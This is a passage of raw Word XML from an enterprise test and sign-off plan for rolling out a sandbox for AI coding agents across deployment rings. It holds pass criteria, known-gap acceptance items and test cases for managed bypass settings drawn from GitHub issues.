              <w:t xml:space="preserve">⚠️ Local sandbox </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">does not apply</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — out of scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NG-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Older Windows PowerShell CWD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Pre-Sept-2026 build: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Set-Location</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, relative git in sandbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1469" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ PowerShell reports </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> as CWD; fix = update OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1569" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Works</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. Sign-off checklist per ring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">Run the mandatory set on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">10 sampled devices per ring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (mix of native Windows and WSL2), on all three clients. A ring is promoted only when every mandatory case matches its expected outcome or has an accepted, ticketed exception.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1629"/>
        <w:gridCol w:w="3279"/>
        <w:gridCol w:w="4452"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1629" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Ring / profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3279" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Mandatory cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4452" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Pass criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1629" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Ring 0 – Observe (P2, learningMode allow)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3279" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">PF-01…09, EN-01…05, EN-12, FS-01, FS-02, FS-13, NW-01, CR-01, CR-02, MC-01, MC-06, NG-07, NG-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4452" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox shows enabled + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">(managed)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; build/test workflows clean; out-of-workspace writes </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">recorded</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> not blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1629" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Ring 1 – Observe (P2, learningMode deny)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3279" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Ring 0 set + EN-13, FS-03…10, FS-21, CR-03, CR-04, BY-01…06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4452" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Out-of-workspace writes </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">blocked + recorded</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; git/gh/package installs still work; bypass prompts behave per client</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1629" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Ring 2 – Balanced (P3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3279" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Ring 1 set + EN-09…11, FS-20, NW-02…12, CR-07…13, MC-02…05, NG-01…05, NG-10, NG-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4452" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Allowlist enforced on WSL2; Windows proxy-ignoring gap documented; deniedPaths fail closed; no build-pipeline regressions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1629" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Strict (P4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3279" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Ring 2 set + FS-14, CR-05, CR-06, CR-15, BY-07…10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4452" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">No bypass anywhere; dev-tool and gh access off; required paths granted explicitly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1629" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Every ring, OFF control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3279" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-04, FS-05, CR-03, CR-04, MC-01 with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">P0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4452" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Each succeeds unsandboxed — confirms the tests themselves detect risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Add from section 11 (GitHub issues and VS Code test plans):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Ring 0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GH-18 (corp-hardened image), GH-19 (D:/Dev Drive repos), GH-20 (shell CWD), GH-22 (override env var), GH-24 (OFF really off), GH-32 (Windows managed file)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Ring 1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GH-01, GH-03, GH-04, GH-06…GH-13, GH-33, GH-34</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Ring 2:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GH-14…GH-17, GH-21, GH-23, GH-25…GH-31</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Strict:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GH-02, GH-05</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Accept or track as known gaps:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GH-18, GH-19, GH-25, GH-28, GH-31 — each has an open upstream bug; re-test on every client version bump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Second sweep:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ring 0 add GH-36, GH-37, GH-38 · Ring 1 add GH-35, GH-39 · Ring 2 add GH-40 (WSL) · Known gaps: GH-35 (until the app fix ships) and GH-36</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sign-off record</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Pre-flight green on all sampled devices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Mandatory cases executed on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CLI, Copilot app and VS Code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, on Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WSL2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ All 🔍 cases resolved and the actual outcome written back into this doc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Known gaps accepted by InfoSec: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NG-07 (ACP)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NG-08 (Local harness)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NW-04 (Windows egress)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CR-11 (credential files)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Evidence (policy output, Policy Diagnostics, screenshots) attached to the ring change record</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quote"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Enterprise example:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in Ring 1 the payments squad runs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">npm ci</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> against Artifactory (FS-13, CR-07) and the data-platform squad runs a local Python MCP server (MC-01, MC-03). Both must pass before Intune assigns the Ring 2 group.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11. Additional cases from VS Code test plans and GitHub issues</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">These 34 cases come from Microsoft's own </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">VS Code QA test plans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">testplan-item</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> issues) and from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">open or recent bug reports</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">github/copilot-cli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">github/app</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">microsoft/vscode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Where a bug report shows actual behaviour differs from the docs, the expected column states the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">documented</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> outcome and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">known issue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> next to it — record which one you see.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="868"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1806"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1337"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Use case (source)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">How to test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – Copilot app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – VS Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox OFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Per-session opt-out with managed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">allowBypass: true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId4" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#342468</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Managed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">enabled: true, allowBypass: true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; turn sandbox off in session A only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox disable</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> is session-only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Session-only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Toggle editable; session B and global setting </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">unchanged</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; can turn back on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Conflicting managed sources</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (vscode#342468)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">MDM </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowBypass: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> + server </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowBypass: true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> wins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Toggle locked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Permissive managed vs stricter user</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId5" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#339645</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Managed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
